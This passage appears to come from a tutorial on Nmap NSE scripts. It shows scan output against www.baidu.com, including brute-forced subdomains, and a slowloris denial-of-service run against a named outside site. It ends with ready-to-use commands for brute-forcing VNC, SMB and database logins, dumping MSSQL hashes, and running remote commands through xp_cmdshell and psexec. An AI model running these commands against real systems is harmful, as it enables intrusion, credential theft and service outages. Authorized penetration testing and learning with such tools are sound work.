Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
443/tcp open https
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
Checking a web server's clock: http-date returns the server's Date header and its offset from local time.
[root@localhost scripts]# nmap -p 443 --script http-date.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
443/tcp open https
|_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Slowloris denial of service: http-slowloris holds many half-finished HTTP requests open to exhaust the server's connection slots, and sites with little capacity go down quickly. It is in the dos category and is disruptive; run it only against systems you are authorized to test.
[root@localhost ~]# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT
Checking for DNS zone transfers: dns-zone-transfer tests whether a name server allows AXFR; if it does, the whole zone, every subdomain included, can simply be pulled. It has to be pointed at the authoritative name server on port 53 with --script-args dns-zone-transfer.domain=<zone>. In the run below the web server was targeted instead, port 53 is filtered, and no transfer was attempted.
[root@localhost scripts]# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [4 ports]
Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:28
Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
Initiating SYN Stealth Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [1 port]
Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
NSE: Script scanning 61.135.169.121.
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.016s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
53/tcp filtered domain
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 6 (240B) | Rcvd: 1 (28B)
Finding other sites on the same IP: hostmap-ip2hosts queries the ip2hosts service, which has long been shut down; to keep using the script, change the code that calls that API.
[root@localhost scripts]# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT STATE SERVICE
80/tcp open http
Host script results:
| hostmap-ip2hosts:
|_ hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121
Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds
Brute-forcing DNS records: dns-brute guesses common hostnames under the target's domain, here baidu.com; the output is shortened because it is long.
[root@localhost scripts]# nmap --script=dns-brute.nse www.baidu.com
Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Host script results:
| dns-brute:
| DNS Brute-force hostnames
| lab.baidu.com - 180.149.144.192
| lab.baidu.com - 180.149.132.122
| corp.baidu.com - 123.129.254.12
|_ log.baidu.com - 10.26.39.14
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
Local VNC scanning: use the VNC scripts to check the version, the authentication types and other sensitive details.
[root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1 #check for the RealVNC 4.1.1 authentication bypass
[root@localhost ~]# nmap --script=vnc-auth 127.0.0.1 #check the VNC authentication types
[root@localhost ~]# nmap --script=vnc-info 127.0.0.1 #get VNC protocol version and security types
[root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #brute-force VNC passwords with the given user and password lists
Local SMB scanning: check Samba/SMB servers
on the LAN, and brute-force them.
[root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1 #simple SMB credential brute-force
[root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1 #check several known serious SMB vulnerabilities (unsafe=1 enables checks that can crash the target)
[root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #brute-force with the given user and password lists
[root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #run commands on the host over SMB with the given credentials (uploads and runs the nmap_service binary)
[root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #list logged-on sessions
[root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #get OS information over SMB
MSSQL scanning: check SQL Server
instances on the LAN, and brute-force them.
[root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #brute-force MSSQL passwords
[root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1 #dump the password hashes
[root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 #execute a command through xp_cmdshell
MySQL scanning: check MySQL
servers on the LAN, and brute-force them.
[root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1 #check for an empty root password
[root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1 #list all users (needs valid credentials)
[root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #brute-force MySQL passwords
Oracle scanning: check Oracle
servers on the LAN, and brute-force them.
[root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1 #brute-force Oracle SIDs
[root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #brute-force weak Oracle credentials